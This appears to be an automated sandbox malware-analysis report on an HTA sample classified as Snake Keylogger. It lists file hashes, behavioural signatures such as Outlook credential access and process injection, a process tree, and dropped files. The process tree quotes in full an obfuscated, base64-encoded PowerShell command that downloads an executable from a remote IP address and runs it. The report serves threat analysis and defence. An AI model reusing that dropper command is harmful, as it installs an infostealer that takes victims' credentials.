Analysis

  • max time kernel
    117s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-10-2024 01:54

General

  • Target

    bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta

  • Size

    150KB

  • MD5

    25a0a6e379daa9cb5c68307fbf0857ea

  • SHA1

    4c672a33a46b32584f00868c4b98d10187a91c3c

  • SHA256

    bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef

  • SHA512

    fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7

  • SSDEEP

    48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2504
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2676
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2636

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp

    Filesize

    1KB

    MD5

    b6ebb62625fd54d906c7d0787fa0e0ae

    SHA1

    317d51f4b05b0ae8a5ba21d9c323167bf83e8cf1

    SHA256

    ac91467226bfcc7ec199f4509b9bad99f02f05d46d839b990d84a8ede3d44060

    SHA512

    4f3060b3b27ab9cd43bd4377892e0d4fcf1cc0fb2804519ab76790b563014038e6451ae09af3795276e987790cc054aead8d11a5a82b71c2910f8f80b1c4a947

  • C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.dll

    Filesize

    3KB

    MD5

    4309a3ed19f70034ccf41f7ea7f6e35c

    SHA1

    b34ebe8ef85436cf21e3d77b1e673ed9d9c2a118

    SHA256

    e28f8fc744a9c323b659a4b433a4e51622375795a7ad90235e4e954d8c0ef80d

    SHA512

    49da216fcc424ac327737e7ffbb578c005d7f91be04f3a7ed6d29c3d0282335c21eeb7e8995b68859b21b077099e9e530f3707f6e3e056b43ed7ff274df0f479

  • C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.pdb

    Filesize

    7KB

    MD5

    034606a291399b39dac22939615faa33

    SHA1

    77b7f601b948b5b92cea5c739068b79d0bab5e4f

    SHA256

    4fc9cfa3d949b5e03737cfbad4a72db283f29cf7027426d4fb406c7e77afc775

    SHA512

    fe5f4a3fe3a3d0967340acb222fd3a159ec5d1469313b8fd7ab1177b14ad72f204c16992fc81225d04f4d092b2fff58c9a06a67bf0d228664affe045f4200fb7

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp

    Filesize

    652B

    MD5

    6502f1e6421fba6da9bc1f2cb505750f

    SHA1

    aa3695363fae491f66b17474abb65dd2f30dc6f7

    SHA256

    a1569e2acc0791066089c9b0a28f1f67c5e893fbb9cddf5c2319d208b0d93094

    SHA512

    0d6ed21bcf96343d1e722267a297e3e050fb563c61511b63a0c76a75caa61bdcb0da79d23d19db4bf3b39176078d86e97d599e30d3f3cf5da99526900782d532

  • \??\c:\Users\Admin\AppData\Local\Temp\jtk9sg2l.0.cs

    Filesize

    477B

    MD5

    3c2b912e8118e7163d3d05a557f13d2f

    SHA1

    8889f87c11a2fca2b363c3064d317447a29c5498

    SHA256

    822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852

    SHA512

    7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499

  • \??\c:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline

    Filesize

    309B

    MD5

    243a99ee64772f6fcb34f92dbca5c43a

    SHA1

    6945fbceb92c05b80be6a8623ece41cc76d3b7be

    SHA256

    b00823537cc8ae7af8903d172aca140a8ba5476bf031650c0af4c6242fc84839

    SHA512

    95f3409c5a7fd5ff3c060a391ddda30dcd3dbe7aaafa28a4d7f0f3dbc2ee6e375f251a190c14bc313ad2047910f03cb2e5799ecc79cb6186381e1a0d8f911f39

  • \Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    931KB

    MD5

    58ff14d476f2bbaab31b12587c09559e

    SHA1

    ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94

    SHA256

    1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364

    SHA512

    a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a

  • memory/2636-29-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2636-31-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2636-30-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB